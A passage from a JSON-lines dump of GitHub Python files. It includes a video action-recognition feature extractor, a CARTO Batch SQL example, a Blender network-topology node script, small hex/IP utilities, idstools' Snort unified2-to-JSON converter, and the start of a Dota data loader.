cv2.imshow(\"img\", img)\n if cv2.waitKey(0) & 0xFF == ord('q'):\n break\n # cv2.imshow(\"img\", img)\n # exit()\n frames.append(gray)\n # varaibels -------------------\n bound_spatial = 9\n bound_temporal = 11\n sigma = 2.4\n tau = 1.7\n omega = 1 / tau\n number_of_R_value = 1\n NumberFrame = len(frames)\n bt = int((bound_temporal - 1) / 2)\n bs = int((bound_spatial - 1) / 2)\n width = len(frames[0][0])\n height = len(frames[0])\n # print('width: {}, height: {}'.format(width, height))\n # --------------------\n # Gaussian\n frames = np.array(frames)\n print(frames.shape)\n for f in range(NumberFrame):\n frames[f, :, :] = cv2.GaussianBlur(frames[f, :, :], (bound_spatial, bound_spatial), sigma)\n # cv2.imwrite('img/blure/' + str(f) + '.jpg', frames[f, :, :])\n #--------------\n # gabor filter\n Hev = np.zeros((1, bound_temporal))\n Hod = np.zeros((1, bound_temporal))\n ti = range(-5, 6, 1)\n ti = np.array(ti)\n for h in range(bound_temporal):\n Hev[0, h] = -1 * math.cos(2 * math.pi * ti[h] * omega) * math.exp(-1 * (ti[h] ** 2) / (tau ** 2))\n Hod[0, h] = -1 * math.sin(2 * math.pi * ti[h] * omega) * math.exp(-1 * (ti[h] ** 2) / (tau ** 2))\n # Hev = preprocessing.normalize(Hev, norm='l1')\n # Hod = preprocessing.normalize(Hod, norm='l1')\n # frames = np.array(frames, dtype='f')\n rarry = np.zeros((frames.shape[0], frames.shape[1], frames.shape[2]))\n\n\n maxarray = []\n\n # print(frames[10-bt:10+bt, 10-bs:10+bs, 10-bs:10+bs])\n\n for f in range(NumberFrame):\n if bt <= f < NumberFrame - bt:\n for h in range(height):\n for w in range(width):\n rarry[f, h, w] = (sum(Hev[0] * frames[(f-bt):(f+bt+1), h, w]) ** 2) + (sum(Hod[0] * frames[(f-bt):(f+bt+1), h, w]) ** 2)\n\n # cv2.imwrite('img/gabor/' + str(f) + '.jpg', rarry[f, :, :])\n # find max R\n img = rarry[f, :, :]\n # print('f = ', f)\n # print('===============')\n\n idx = 0\n # img[0:bs+1, :] = 255\n # img[height-bs:, width-bs:] = 0\n # cv2.imwrite('action/img' + str(f) + '.jpg', img)\n # print(img[0:bs, 0:bs])\n while idx < number_of_R_value:\n h, w = np.where(img == np.amax(img))\n value = img[h[0], w[0]]\n # print(\"f = {}, h = {}, w ={}, value = {}\".format(f, h, w, value))\n maxarray.append([f, h[0], w[0], value])\n img[(h[0] - 1):(h[0] + 2), (w[0] - 1):(w[0] + 2)] = 0\n idx += 1\n else:\n rarry[f, :, :] = 0\n\n # ==========================================================\n cap = cv2.VideoCapture(video_read)\n f = 0\n print('start:')\n while(True):\n ret, frame = cap.read()\n img2 = frame\n if ret == True:\n if bt <= f < len(frames)-bt:\n v = 0\n for item in maxarray:\n if item[0] == f:\n if v < 5:\n if v == 1:\n img2 = cv2.rectangle(frame, (item[2], item[1]), (item[2] + 3, item[1] + 3), (45, 255, 255), 3)\n cv2.imshow('img2', img2)\n else:\n img2 = cv2.rectangle(frame, (item[2], item[1]), (item[2] + 3, item[1] + 3), (45, 255, 255), 3)\n cv2.imshow('img2', img2)\n v += 1\n else:\n break\n\n cv2.imwrite('img/dollar3/' + str(f) + '.jpg', img2)\n f += 1\n if cv2.waitKey(0) & 0xFF == ord('q'):\n break\n else:\n break\n cap.release()\n cv2.destroyAllWindows()\n\n return maxarray\n\n\npath = \"videos_hmdb/\"\nlst = os.listdir(path)\nlst2 = os.listdir('maxvalue_hmdb/')\nfor file in lst:\n file = '15020' \\\n '.avi'\n start_time = time.time()\n print(file)\n Dollar(file)\n print(\"--- %s seconds ---\" % (time.time() - start_time))\n","repo_name":"atefehmoradyani/HAR","sub_path":"Dollarextract.py","file_name":"Dollarextract.py","file_ext":"py","file_size_in_byte":5628,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70661334594","text":"import argparse\nimport logging\nimport os\nimport warnings\n\nfrom carto.auth import APIKeyAuthClient\nfrom carto.sql import BatchSQLClient\n\nwarnings.filterwarnings('ignore')\n\n# Logger (better than print)\nlogging.basicConfig(\n level=logging.INFO,\n format=' %(asctime)s - %(levelname)s - %(message)s',\n datefmt='%I:%M:%S %p')\nlogger = logging.getLogger()\n\n# set input arguments\nparser = argparse.ArgumentParser(\n description='Creates a Batch SQL API job and waits for its completion')\n\nparser.add_argument('--query', type=str, dest='query',\n help='Set the query that you want to apply')\n\nparser.add_argument('--organization', type=str, dest='organization',\n default=os.environ['CARTO_ORG'] if 'CARTO_ORG' in os.environ else '',\n help='Set the name of the organization' +\n ' account (defaults to env variable CARTO_ORG)')\n\nparser.add_argument('--base_url', type=str, dest='CARTO_BASE_URL',\n default=os.environ['CARTO_API_URL'] if 'CARTO_API_URL' in os.environ else '',\n help='Set the base URL. For example:' +\n ' https://username.carto.com/ ' +\n '(defaults to env variable CARTO_API_URL)')\n\nparser.add_argument('--api_key', dest='CARTO_API_KEY',\n default=os.environ['CARTO_API_KEY'] if 'CARTO_API_KEY' in os.environ else '',\n help='Api key of the account' +\n ' (defaults to env variable CARTO_API_KEY)')\n\nargs = parser.parse_args()\n\n# Set authentification to CARTO\nif args.CARTO_BASE_URL and args.CARTO_API_KEY and args.organization:\n auth_client = APIKeyAuthClient(\n args.CARTO_BASE_URL, args.CARTO_API_KEY, args.organization)\n batchSQLClient = BatchSQLClient(auth_client)\nelse:\n logger.error('You need to provide valid credentials, run with -h parameter for details')\n import sys\n sys.exit(1)\n\njob = batchSQLClient.create_and_wait_for_completion(args.query)\nlogger.info('Job finished with status {status}'.format(status=job['status']))\n","repo_name":"CartoDB/carto-python","sub_path":"examples/sql_batch_api_wait_for_completion.py","file_name":"sql_batch_api_wait_for_completion.py","file_ext":"py","file_size_in_byte":2074,"program_lang":"python","lang":"en","doc_type":"code","stars":154,"dataset":"github-code","pt":"61"} +{"seq_id":"35176789958","text":"import json\r\nimport os\r\nimport re\r\nimport sys\r\nfrom copy import deepcopy\r\nfrom itertools import combinations, repeat, takewhile\r\nfrom json import encoder\r\nfrom math import sqrt\r\nfrom operator import add\r\nfrom random import choice, uniform\r\n\r\nimport numpy as np\r\nimport igraph as ig\r\n\r\nimport bgl\r\nimport blf\r\nimport bpy\r\nfrom bpy.props import *\r\nfrom bpy_extras import view3d_utils\r\nfrom bpy.types import NodeTree, Node, NodeSocket\r\n\r\nglobal he\r\n\r\ndef dumps(obj):\r\n \"\"\"Outputs json with formatting edits + object handling.\"\"\"\r\n return json.dumps(obj, indent=4, sort_keys=True, cls=CustomEncoder)\r\nclass CustomEncoder(json.JSONEncoder):\r\n\r\n def encode(self, obj):\r\n \"\"\"Fired for every object.\"\"\"\r\n s = super(CustomEncoder, self).encode(obj)\r\n # If uncompressed, postprocess for formatting\r\n if len(s.splitlines()) > 1:\r\n s = self.postprocess(s)\r\n return s\r\n\r\n def postprocess(self, json_string):\r\n \"\"\"Displays each entry on its own line.\"\"\"\r\n is_compressing, is_hash, compressed, spaces = False, False, [], 0\r\n for row in json_string.split(\"\\n\"):\r\n if is_compressing:\r\n if (row[:spaces + 5] == \" \" * (spaces + 4) +\r\n (\"\\\"\" if is_hash else \"{\")):\r\n compressed.append(row.rstrip())\r\n elif (len(row) > spaces and row[:spaces] == \" \" * spaces and\r\n re.match(\"[\\]\\}],?\", row[spaces:].rstrip())):\r\n compressed.append(row.rstrip())\r\n is_compressing = False\r\n else:\r\n compressed[-1] += \" \" + row.strip()\r\n else:\r\n compressed.append(row.rstrip())\r\n if any(a in row for a in [\"edges\", \"nodes\"]):\r\n # Fix to handle issues that arise with empty lists\r\n if \"[]\" in row:\r\n continue\r\n spaces = sum(1 for _ in takewhile(str.isspace, row))\r\n is_compressing, is_hash = True, \"{\" in row\r\n return \"\\n\".join(compressed)\r\n\r\ndef generate_edges(*args, **kw):\r\n if kw['r_name'] in args:\r\n i = args.index(kw[\"r_name\"])\r\n if kw['net_name'] in args:\r\n j = args.index(kw[\"net_name\"])\r\n tup = (i, j)\r\n Edges.append(tup)\r\n \r\ndef generate_edges2(*args, **kw):\r\n if kw[\"display_name\"] in args:\r\n j = args.index(kw[\"display_name\"])\r\n if kw['net_name'] in args:\r\n i = args.index(kw[\"net_name\"])\r\n tup = (i, j)\r\n Edges.append(tup)\r\n\r\nclass VadCustomTree(NodeTree):\r\n '''A vad node tree type that will show up in the node editor header'''\r\n bl_idname = 'VadTreeType'\r\n bl_label = 'Vad Node Tree'\r\n bl_icon = 'NODETREE'\r\n\r\n# Vad socket type\r\nclass VadCustomSocket(NodeSocket):\r\n '''Vad node socket type'''\r\n bl_idname = 'VadSocketType'\r\n bl_label = 'Vad Node Socket'\r\n\r\n def draw(self, context, layout, node, text):\r\n layout.label(text)\r\n\r\n def draw_color(self, context, node):\r\n return (1.0, 0.4, 0.216, 0.5)\r\n\r\n\r\nclass VadCustomTreeNode:\r\n @classmethod\r\n def poll(cls, ntree):\r\n return ntree.bl_idname == 'VadTreeType'\r\n\r\n\r\nclass VadCustomNode(Node, VadCustomTreeNode):\r\n '''A custom node'''\r\n bl_idname = 'VadNodeType'\r\n bl_label = 'Vad Node'\r\n bl_icon = 'SOUND'\r\n \r\n string_name = bpy.props.StringProperty()\r\n \r\n index = bpy.props.IntProperty(default = 0)\r\n \r\n def init(self, context):\r\n self.inputs.new('VadSocketType', \" \")\r\n \r\n self.outputs.new('NodeSocketColor', \" \")\r\n \r\n def copy(self, node):\r\n print(\"Copying from node \", node)\r\n \r\n def free(self):\r\n print(\"Removing node \", self, \", Goodbye!\")\r\n \r\n def draw_buttons(self, context, layout):\r\n layout.label(self.string_name)\r\n \r\n def draw_label(self):\r\n return \"vad node\"\r\n\r\nclass OBJECT_OT_HelloButton(bpy.types.Operator):\r\n bl_idname = \"hello.hello\"\r\n bl_label = \"Say Hello\" \r\n \r\n def execute(self, context):\r\n print(\"hhh\")\r\n\r\nimport nodeitems_utils\r\nfrom nodeitems_utils import NodeCategory, NodeItem\r\n\r\nclass VadNodeCategory(NodeCategory):\r\n @classmethod\r\n def poll(cls, context):\r\n return context.space_data.tree_type == 'VadTreeType'\r\n\r\nnode_categories = [\r\n # identifier, label, items list\r\n VadNodeCategory(\"SOMENODES\", \"Some Nodes\", items=[\r\n # our basic node\r\n NodeItem(\"VadNodeType\"),\r\n ]),\r\n ]\r\n\r\ndef register():\r\n bpy.utils.register_class(VadCustomTree)\r\n bpy.utils.register_class(VadCustomSocket)\r\n bpy.utils.register_class(VadCustomNode)\r\n bpy.utils.register_class(OBJECT_OT_HelloButton)\r\n\r\n nodeitems_utils.register_node_categories(\"CUSTOM_NODES\", node_categories)\r\n\r\n\r\ndef unregister():\r\n nodeitems_utils.unregister_node_categories(\"CUSTOM_NODES\")\r\n\r\n bpy.utils.unregister_class(VadCustomTree)\r\n bpy.utils.unregister_class(VadCustomSocket)\r\n bpy.utils.unregister_class(VadCustomNode)\r\n bpy.utils.unregister_class(OBJECT_OT_HelloButton)\r\n\r\n \r\ndata0 = []\r\ndata1 = []\r\nif __name__ == \"__main__\":\r\n register()\r\n Edges=[]\r\n with open(\"e:/20190116_1.json\") as in_file:\r\n for line in in_file.readlines():\r\n edges1 = json.loads(line)\r\n data0.append(edges1)\r\n with open(\"e:/20190116_2.json\") as in_file:\r\n for line in in_file.readlines():\r\n edges2 = json.loads(line)\r\n data1.append(edges2)\r\n \r\n edges = data0\r\n edges1 = data1\r\n \r\n available_nodes = set(e['r_name'] for e in edges) | set(e[\"net_name\"] for e in edges) | set(e[\"display_name\"] for e in data1)\r\n\r\n labels = list(available_nodes)\r\n \r\n \r\n for k in range(len(edges)):\r\n generate_edges(*labels, **edges[k])\r\n \r\n for k in range(len(edges1)):\r\n generate_edges2(*labels, **edges1[k])\r\n \r\n G = ig.Graph(Edges, directed = False)\r\n\r\n layt = G.layout(\"tree\")\r\n layt.center()\r\n master_nodes = {}\r\n for i in range(len(labels)):\r\n master_nodes[labels[i]] = {\"location\":[j*200 for j in layt[i]]}\r\n tmp = master_nodes[labels[i]][\"location\"][0]\r\n master_nodes[labels[i]][\"location\"][0] = master_nodes[labels[i]][\"location\"][1]\r\n master_nodes[labels[i]][\"location\"][1] = tmp\r\n \r\n json_str = dumps({\"edges\": edges+edges1, \"nodes\": master_nodes})\r\n network = json.loads(json_str)\r\n \r\n bpy.context.scene.use_nodes = True\r\n tree = bpy.context.scene.node_tree\r\n\r\n # clear default nodes\r\n for node in tree.nodes:\r\n tree.nodes.remove(node)\r\n \r\n for vad_label in labels:\r\n vad_node = tree.nodes.new(type='VadNodeType')\r\n vad_node.location = tuple(network[\"nodes\"][vad_label][\"location\"])\r\n vad_node.name = vad_label\r\n vad_node.label = vad_label\r\n vad_node.inputs[0].link_limit = 4095\r\n #vad_node.inputs.new('VadSocketType', \" \")\r\n \r\n links = tree.links\r\n \r\n for e in edges:\r\n source_r = tree.nodes[e[\"r_name\"]]\r\n source_net = tree.nodes[e[\"net_name\"]]\r\n \r\n if e[\"net_name\"]==\"public\":\r\n links.new(source_net.outputs[0], source_r.inputs[0])\r\n else:\r\n links.new(source_r.outputs[0], source_net.inputs[0])\r\n \r\n for e in edges1:\r\n source = tree.nodes[e[\"net_name\"]]\r\n target = tree.nodes[e[\"display_name\"]]\r\n links.new(source.outputs[0], target.inputs[0])\r\n \r\n","repo_name":"hustWang/test","sub_path":"blender/network_topology.py","file_name":"network_topology.py","file_ext":"py","file_size_in_byte":7493,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71403100994","text":"def toIpAdress(hexIp):\n # print(\"hex ip is {}\".format(hexIp))\n if(len(hexIp) == 8):\n res = \"\"\n res = res + str(int(\"0x\"+hexIp[0:2], 16))+\".\"\n res = res + str(int(\"0x\"+hexIp[2:4], 16))+\".\"\n res = res + str(int(\"0x\"+hexIp[4:6], 16))+\".\"\n res = res + str(int(\"0x\"+hexIp[6:8], 16))\n return res\n else:\n console.log(\"Erreur: Mauvaise taille hexa pour IP\")\n return False\n\ndef hexToMac(hexMac):\n if(len(hexMac) == 12):\n res = hexMac[0:2] + \":\" + hexMac[2:4] + \":\" + hexMac[4:6] + \\\n \":\" + hexMac[6:8] + \":\" + hexMac[8:10] + \":\" + hexMac[10:12]\n return res\n else:\n console.log(\"Erreur : mauvaise taille d'adresse mac : {}\".format(len(hexMac)))\n return False\n\ndef get_ascii(str):\n res = \"\"\n i = 0\n while(i < len(str)):\n curr = str[i : i + 2]\n if (curr == \"00\"):\n break\n res += chr(int(\"0x\" + curr, 16))\n i += 2\n return res\n\n# print(get_ascii(\"30313233343500000000000031231\"))","repo_name":"Cyren4/wiredolp","sub_path":"sources/web/Node-app/pythonScript/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1026,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29274564055","text":"from __future__ import print_function\n\nimport sys\nimport os\nimport os.path\nimport base64\nimport string\nimport json\nimport logging\n\nif sys.argv[0] == __file__:\n sys.path.insert(\n 0, os.path.abspath(os.path.join(__file__, \"..\", \"..\", \"..\")))\n\ntry:\n import argparse\nexcept ImportError as err:\n from idstools.compat.argparse import argparse\n\ntry:\n from collections import OrderedDict\nexcept ImportError as err:\n from idstools.compat.ordereddict import OrderedDict\n\nfrom idstools import unified2\nfrom idstools import maps\nfrom idstools import util\n\nlogging.basicConfig(level=logging.INFO, format=\"%(levelname)s: %(message)s\")\nLOG = logging.getLogger()\n\nclass Formatter(object):\n\n def __init__(self, msgmap=None, classmap=None, packet_printable=False,\n packet_hex=False, extra_printable=False):\n self.msgmap = msgmap\n self.classmap = classmap\n self.packet_printable = packet_printable\n self.packet_hex = packet_hex\n self.extra_printable = extra_printable\n\n def key(self, key):\n return key\n\n def resolve_msg(self, event, default=None):\n if self.msgmap:\n signature = self.msgmap.get(\n event[\"generator-id\"], event[\"signature-id\"])\n if signature:\n return signature[\"msg\"]\n return default\n\n def resolve_classification(self, event, default=None):\n if self.classmap:\n classinfo = self.classmap.get(event[\"classification-id\"])\n if classinfo:\n return classinfo[\"description\"]\n return default\n\n def format_event(self, record):\n event = {}\n\n msg = self.resolve_msg(record)\n if msg:\n event[\"msg\"] = msg\n classification = self.resolve_classification(record)\n if classification:\n event[\"classification\"] = classification\n\n for key in record:\n if key.endswith(\".raw\"):\n continue\n elif key in [\"extra-data\", \"packets\"]:\n continue\n elif key == \"appid\" and not record[\"appid\"]:\n continue\n else:\n event[key] = record[key]\n return OrderedDict([(\"type\", \"event\"), (\"event\", event)])\n\n def format_packet(self, record):\n packet = {}\n for key in record:\n if key == \"data\":\n packet[\"data\"] = base64.b64encode(record[key]).decode(\"utf-8\")\n if self.packet_printable:\n packet[\"data-printable\"] = util.format_printable(\n record[key])\n if self.packet_hex:\n packet[\"data-hex\"] = self.format_hex(record[key])\n else:\n packet[key] = record[key]\n return OrderedDict([(\"type\", \"packet\"), (\"packet\", packet)])\n\n def format_hex(self, data):\n if sys.version_info.major < 3:\n hexbytes = [\"%02x\" % ord(byte) for byte in data]\n else:\n hexbytes = [\"%02x\" % byte for byte in data]\n return \" \".join(hexbytes)\n\n def format_extra_data(self, record):\n data = {}\n\n # Remove this, the printable data is accessible as\n # \"data-printable\" now.\n #\n # # For data types that can be printed in plain text, extract\n # # the data into its own field with a descriptive name.\n # if record[\"type\"] == unified2.EXTRA_DATA_TYPE[\"SMTP_FILENAME\"]:\n # data[\"smtp-filename\"] = record[\"data\"]\n # elif record[\"type\"] == unified2.EXTRA_DATA_TYPE[\"SMTP_MAIL_FROM\"]:\n # data[\"smtp-from\"] = record[\"data\"]\n # elif record[\"type\"] == unified2.EXTRA_DATA_TYPE[\"SMTP_RCPT_TO\"]:\n # data[\"smtp-rcpt-to\"] = record[\"data\"]\n # elif record[\"type\"] == unified2.EXTRA_DATA_TYPE[\"SMTP_HEADERS\"]:\n # data[\"smtp-headers\"] = record[\"data\"]\n # elif record[\"type\"] == unified2.EXTRA_DATA_TYPE[\"HTTP_URI\"]:\n # data[\"http-uri\"] = record[\"data\"]\n # elif record[\"type\"] == unified2.EXTRA_DATA_TYPE[\"HTTP_HOSTNAME\"]:\n # data[\"http-hostname\"] = record[\"data\"]\n # elif record[\"type\"] == unified2.EXTRA_DATA_TYPE[\"NORMALIZED_JS\"]:\n # data[\"javascript\"] = record[\"data\"]\n # else:\n # LOG.warning(\"Unknown extra-data record type: %s\" % (\n # str(record[\"type\"])))\n\n for key, val in unified2.EXTRA_DATA_TYPE.items():\n if val == record[\"type\"]:\n data[self.key(\"extra-data-type\")] = key.lower()\n break\n\n for key in record:\n if key == \"data\":\n data[\"data\"] = base64.b64encode(record[key]).decode(\"utf-8\")\n if self.extra_printable:\n data[\"data-printable\"] = util.format_printable(record[key])\n else:\n data[key] = record[key]\n\n return OrderedDict([(\"type\", self.key(\"extra-data\")),\n (self.key(\"extra-data\"), data)])\n\n def format(self, record):\n if isinstance(record, unified2.Event):\n return self.format_event(record)\n elif isinstance(record, unified2.Packet):\n return self.format_packet(record)\n elif isinstance(record, unified2.ExtraData):\n return self.format_extra_data(record)\n else:\n LOG.warning(\"Unknown record type: %s: %s\" % (\n str(record.__class__), str(record)))\n\nclass OutputWrapper(object):\n\n def __init__(self, filename, fileobj=None):\n self.filename = filename\n self.fileobj = fileobj\n\n if self.fileobj is None:\n self.isfile = True\n self.reopen()\n else:\n self.isfile = False\n\n def reopen(self):\n if not self.isfile:\n return\n if self.fileobj:\n self.fileobj.close()\n self.fileobj = open(self.filename, \"a\")\n\n def write(self, buf):\n if self.isfile:\n if not os.path.exists(self.filename):\n self.reopen()\n self.fileobj.write(buf)\n self.fileobj.write(\"\\n\")\n self.fileobj.flush()\n\ndef load_from_snort_conf(snort_conf, classmap, msgmap):\n snort_etc = os.path.dirname(os.path.expanduser(snort_conf))\n\n classification_config = os.path.join(snort_etc, \"classification.config\")\n if os.path.exists(classification_config):\n LOG.debug(\"Loading %s.\", classification_config)\n classmap.load_from_file(open(classification_config))\n\n genmsg_map = os.path.join(snort_etc, \"gen-msg.map\")\n if os.path.exists(genmsg_map):\n LOG.debug(\"Loading %s.\", genmsg_map)\n msgmap.load_generator_map(open(genmsg_map))\n\n sidmsg_map = os.path.join(snort_etc, \"sid-msg.map\")\n if os.path.exists(sidmsg_map):\n LOG.debug(\"Loading %s.\", sidmsg_map)\n msgmap.load_signature_map(open(sidmsg_map))\n\nepilog = \"\"\"If --directory and --prefix are provided files will be\nread from the specified 'spool' directory. Otherwise files on the\ncommand line will be processed.\n\"\"\"\n\ndef rollover_hook(closed, opened):\n \"\"\" The rollover hook for the spool reader. Will delete the closed file. \"\"\"\n LOG.debug(\"closed=%s; opened=%s\" % (closed, opened))\n LOG.debug(\"Deleting %s.\", closed)\n os.unlink(closed)\n\ndef main():\n\n msgmap = maps.SignatureMap()\n classmap = maps.ClassificationMap()\n\n parser = argparse.ArgumentParser(\n fromfile_prefix_chars='@', epilog=epilog)\n parser.add_argument(\n \"-C\", dest=\"classification_path\", metavar=\"\",\n help=\"path to classification config\")\n parser.add_argument(\n \"-S\", dest=\"sidmsgmap_path\", metavar=\"\",\n help=\"path to sid-msg.map\")\n parser.add_argument(\n \"-G\", dest=\"genmsgmap_path\", metavar=\"\",\n help=\"path to gen-msg.map\")\n parser.add_argument(\n \"--snort-conf\", dest=\"snort_conf\", metavar=\"\",\n help=\"attempt to load classifications and map files based on the \"\n \"location of the snort.conf\")\n parser.add_argument(\n \"--directory\", metavar=\"\",\n help=\"spool directory (eg: /var/log/snort)\")\n parser.add_argument(\n \"--prefix\", metavar=\"\",\n help=\"spool filename prefix (eg: unified2.log)\")\n parser.add_argument(\n \"--bookmark\", metavar=\"\", help=\"enable bookmarking\")\n parser.add_argument(\n \"--follow\", action=\"store_true\", default=False,\n help=\"follow files/continuous mode (spool mode only)\")\n parser.add_argument(\n \"--delete\", action=\"store_true\", default=False,\n help=\"delete spool files\")\n parser.add_argument(\n \"--output\", metavar=\"\",\n help=\"output filename (eg: /var/log/snort/alerts.json\")\n parser.add_argument(\n \"--stdout\", action=\"store_true\", default=False,\n help=\"also log to stdout if --output is a file\")\n parser.add_argument(\n \"--sort-keys\", dest=\"sort_keys\", action=\"store_true\", default=False,\n help=\"the output of dictionaries will be sorted by key\")\n parser.add_argument(\n \"--verbose\", action=\"store_true\", default=False,\n help=\"be more verbose\")\n parser.add_argument(\n \"--packet-printable\", action=\"store_true\", default=False,\n help=\"output printable packet data in addition to base64\")\n parser.add_argument(\n \"--packet-hex\", action=\"store_true\", default=False,\n help=\"output packet data as hex in addition to base64\")\n parser.add_argument(\n \"--extra-printable\", action=\"store_true\", default=False,\n help=\"output printable extra data in addition to base64\")\n parser.add_argument(\n \"filenames\", nargs=\"*\")\n args = parser.parse_args()\n\n if args.verbose:\n LOG.setLevel(logging.DEBUG)\n\n if args.snort_conf:\n load_from_snort_conf(args.snort_conf, classmap, msgmap)\n\n if args.classification_path:\n classmap.load_from_file(\n open(os.path.expanduser(args.classification_path)))\n if args.genmsgmap_path:\n msgmap.load_generator_map(open(os.path.expanduser(args.genmsgmap_path)))\n if args.sidmsgmap_path:\n msgmap.load_signature_map(open(os.path.expanduser(args.sidmsgmap_path)))\n\n if msgmap.size() == 0:\n LOG.warning(\"No alert message map entries loaded.\")\n else:\n LOG.info(\"Loaded %s rule message map entries.\", msgmap.size())\n\n if classmap.size() == 0:\n LOG.warning(\"No classifications loaded.\")\n else:\n LOG.info(\"Loaded %s classifications.\", classmap.size())\n\n outputs = []\n\n if args.output:\n outputs.append(OutputWrapper(args.output))\n if args.stdout:\n outputs.append(OutputWrapper(\"-\", sys.stdout))\n else:\n outputs.append(OutputWrapper(\"-\", sys.stdout))\n\n bookmark = None\n\n if args.filenames:\n if args.bookmark:\n LOG.error(\"Bookmarking not valid in file mode.\")\n return 1\n if args.follow:\n LOG.error(\"Follow not valid in file mode.\")\n return 1\n if args.delete:\n LOG.error(\"Delete not valid in file mode.\")\n return 1\n reader = unified2.FileRecordReader(*args.filenames)\n elif args.directory and args.prefix:\n if args.bookmark:\n bookmark = unified2.Unified2Bookmark(filename=args.bookmark)\n init_filename, init_offset = bookmark.get()\n else:\n init_filename = None\n init_offset = None\n reader = unified2.SpoolRecordReader(\n directory=args.directory,\n prefix=args.prefix,\n follow=args.follow,\n rollover_hook=rollover_hook if args.delete else None,\n init_filename=init_filename,\n init_offset=init_offset)\n else:\n LOG.error(\"No spool or files provided.\")\n return 1\n\n formatter = Formatter(\n msgmap=msgmap, classmap=classmap,\n packet_printable=args.packet_printable,\n packet_hex=args.packet_hex,\n extra_printable=args.extra_printable)\n\n count = 0\n\n try:\n for record in reader:\n try:\n as_json = json.dumps(\n formatter.format(record), sort_keys=args.sort_keys)\n for out in outputs:\n out.write(as_json)\n count += 1\n except Exception as err:\n LOG.error(\"Failed to encode record as JSON: %s: %s\" % (\n str(err), str(record)))\n raise\n if bookmark:\n filename, offset = reader.tell()\n bookmark.update(filename, offset)\n except unified2.UnknownRecordType as err:\n if count == 0:\n LOG.error(\"%s: Is this a unified2 file?\" % (err))\n else:\n LOG.error(err)\n\nif __name__ == \"__main__\":\n sys.exit(main())\n","repo_name":"jasonish/py-idstools","sub_path":"idstools/scripts/u2json.py","file_name":"u2json.py","file_ext":"py","file_size_in_byte":12866,"program_lang":"python","lang":"en","doc_type":"code","stars":261,"dataset":"github-code","pt":"61"} +{"seq_id":"12582818284","text":"class Farhad:\r\n def __init__(self,a,b,):\r\n self.a=a\r\n self.b=b\r\n def Calculation(self):\r\n div = self.a / self.b\r\n mod = self.a % self.b\r\n #def show(self):\r\n print(int(div))\r\n print(mod)\r\n print(f\"({int(div)},{mod})\")\r\nfarhad=Farhad(a=int(input()),b=int(input()))\r\nfarhad.Calculation()","repo_name":"Farhad0111/Mod_Divmod_HackerRank.py","sub_path":"Mod_Divmod.py","file_name":"Mod_Divmod.py","file_ext":"py","file_size_in_byte":342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"10271917231","text":"import json\nimport os\nfrom multiprocessing import Pool\n\nimport numpy as np\nimport pandas\nimport scipy.stats as stats\nimport torch\nfrom torch.nn.utils.rnn import pad_sequence\nfrom torch.utils.data import Dataset\nfrom tqdm import tqdm\n\n__all__ = ['DotaData', 'load_as_data_frame']\n\n\ndef _check_path_match(s):\n \"\"\" Random hash to split data set to train, valid, and test. \"\"\"\n if not s.endswith('.json'):\n return 'none'\n u = int(s[:-5]) % 1000000021\n u = (u * 479342492 + 277101274) % 1000000021\n v = int(s[:-5]) % 1000000033\n v = (v * 27448077 + 702331637) % 1000000033\n w = ((u + v) * 897630631 + 28665357) % 1000000087\n w = w / (1000000087.0 - 1.0)\n if w < 0.05:\n return 'test'\n elif 0.05 <= w < 0.15:\n return 'valid'\n else:\n return 'train'\n\n\nlv_xp_req = [\n 0,\n 230,\n 600,\n 1080,\n 1680,\n 2300,\n 2940,\n 3600,\n 4280,\n 5080,\n 5900,\n 6740,\n 7640,\n 8865,\n 10115,\n 11390,\n 12690,\n 14015,\n 15415,\n 16905,\n 18405,\n 20155,\n 22155,\n 24405,\n 26905,\n]\n\nhero2id = {\n 'npc_dota_hero_antimage': 1,\n 'npc_dota_hero_axe': 2,\n 'npc_dota_hero_bane': 3,\n 'npc_dota_hero_bloodseeker': 4,\n 'npc_dota_hero_crystal_maiden': 5,\n 'npc_dota_hero_drow_ranger': 6,\n 'npc_dota_hero_earthshaker': 7,\n 'npc_dota_hero_juggernaut': 8,\n 'npc_dota_hero_mirana': 9,\n 'npc_dota_hero_nevermore': 11,\n 'npc_dota_hero_morphling': 10,\n 'npc_dota_hero_phantom_lancer': 12,\n 'npc_dota_hero_puck': 13,\n 'npc_dota_hero_pudge': 14,\n 'npc_dota_hero_razor': 15,\n 'npc_dota_hero_sand_king': 16,\n 'npc_dota_hero_storm_spirit': 17,\n 'npc_dota_hero_sven': 18,\n 'npc_dota_hero_tiny': 19,\n 'npc_dota_hero_vengefulspirit': 20,\n 'npc_dota_hero_windrunner': 21,\n 'npc_dota_hero_zuus': 22,\n 'npc_dota_hero_kunkka': 23,\n 'npc_dota_hero_lina': 25,\n 'npc_dota_hero_lich': 31,\n 'npc_dota_hero_lion': 26,\n 'npc_dota_hero_shadow_shaman': 27,\n 'npc_dota_hero_slardar': 28,\n 'npc_dota_hero_tidehunter': 29,\n 'npc_dota_hero_witch_doctor': 30,\n 'npc_dota_hero_riki': 32,\n 'npc_dota_hero_enigma': 33,\n 'npc_dota_hero_tinker': 34,\n 'npc_dota_hero_sniper': 35,\n 'npc_dota_hero_necrolyte': 36,\n 'npc_dota_hero_warlock': 37,\n 'npc_dota_hero_beastmaster': 38,\n 'npc_dota_hero_queenofpain': 39,\n 'npc_dota_hero_venomancer': 40,\n 'npc_dota_hero_faceless_void': 41,\n 'npc_dota_hero_skeleton_king': 42,\n 'npc_dota_hero_death_prophet': 43,\n 'npc_dota_hero_phantom_assassin': 44,\n 'npc_dota_hero_pugna': 45,\n 'npc_dota_hero_templar_assassin': 46,\n 'npc_dota_hero_viper': 47,\n 'npc_dota_hero_luna': 48,\n 'npc_dota_hero_dragon_knight': 49,\n 'npc_dota_hero_dazzle': 50,\n 'npc_dota_hero_rattletrap': 51,\n 'npc_dota_hero_leshrac': 52,\n 'npc_dota_hero_furion': 53,\n 'npc_dota_hero_life_stealer': 54,\n 'npc_dota_hero_dark_seer': 55,\n 'npc_dota_hero_clinkz': 56,\n 'npc_dota_hero_omniknight': 57,\n 'npc_dota_hero_enchantress': 58,\n 'npc_dota_hero_huskar': 59,\n 'npc_dota_hero_night_stalker': 60,\n 